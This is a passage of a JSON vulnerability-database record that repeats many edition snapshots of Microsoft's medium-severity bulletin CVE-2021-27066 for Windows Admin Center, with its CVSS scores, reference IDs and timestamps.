"kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:45:33", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-13T04:48:48", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:48:48", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-13T06:58:34", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:58:34", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-13T10:42:34", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:42:34", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-14T02:47:55", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:47:55", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-14T04:51:38", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-14T04:51:38", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-14T04:51:38", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:51:38", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-16T11:27:54", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-14T04:51:38", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-14T04:51:38", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:27:54", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-16T12:43:00", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:43:00", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T02:49:59", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:49:59", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T04:45:07", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:45:07", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T10:51:14", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:51:14", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T12:42:10", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:42:10", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", 